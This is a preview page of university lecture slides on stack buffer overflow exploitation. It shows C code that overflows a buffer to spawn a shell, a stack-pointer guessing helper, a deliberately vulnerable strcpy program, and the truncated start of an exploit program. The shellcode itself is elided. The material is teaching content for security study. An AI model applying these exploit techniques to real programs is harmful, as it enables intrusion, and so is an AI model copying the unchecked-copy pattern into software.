CSCI6268L31 - Foundations of Network and Computer Security...

Info iconThis preview shows pages 1–7. Sign up to view the full content.

View Full Document Right Arrow Icon
Foundations of Network and Foundations of Network and Computer Security Computer Security J J ohn Black Lecture #31 Nov 16 th 2009 CSCI 6268/TLEN 5550, Fall 2009
Background image of page 1

Info iconThis preview has intentionally blurred sections. Sign up to view the full version.

View Full DocumentRight Arrow Icon
Ok, We’re Done? Well… We have zero-less shell code It is relocatable It spawns a shell We just have to get it onto the stack of some vulnerable program! And then we have to modify the return address in that stack frame to jump to the beginning of our shell code… ahh… If we know the buffer size and the address where the buffer sits, we’re done (this is the case when we have the code on the same OS sitting in front of us) If we don’t know these two items, we have to guess…
Background image of page 2
If we know where the buffer is char shellcode[] = . . . char large_string[128]; void main() { char buffer[96]; long *long_ptr = (long *) large_string; for (i = 0; i < 32; i++) *(long_ptr + i) = (int) buffer; for (i = 0; i < strlen(shellcode); i++) large_string[i] = shellcode[i]; large_string[i] = ‘\0’; strcpy(buffer,large_string); } // This works: ie, it spawns a shell
Background image of page 3

Info iconThis preview has intentionally blurred sections. Sign up to view the full version.

View Full DocumentRight Arrow Icon
Otherwise, how do we Guess? The stack always starts at the same (high) memory address Here is sp.c: unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main() { printf("0x%x\n", get_sp()); } $ ./sp 0x8000470 $
Background image of page 4
vulnerable.c void main(int argc, char *argv[]) { char buffer[512]; if (argc > 1) strcpy(buffer,argv[1]); } Now we need to inject our shell code into this program We’ll pretend we don’t know the code layout or the buffer size Let’s attack this program
Background image of page 5

Info iconThis preview has intentionally blurred sections. Sign up to view the full version.

View Full DocumentRight Arrow Icon
exploit1.c void main(int argc, char *argv[]) { if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); buff = malloc(bsize); addr = get_sp() - offset; printf("Using address: 0x%x\n", addr); ptr = buff;
Background image of page 6
Image of page 7
This is the end of the preview. Sign up to access the rest of the document.

This note was uploaded on 03/11/2010 for the course CS 6268 taught by Professor Black during the Spring '09 term at University of Colombo.

Page1 / 20

CSCI6268L31 - Foundations of Network and Computer Security...

This preview shows document pages 1 - 7. Sign up to view the full document.

View Full Document Right Arrow Icon
Ask a homework question - tutors are online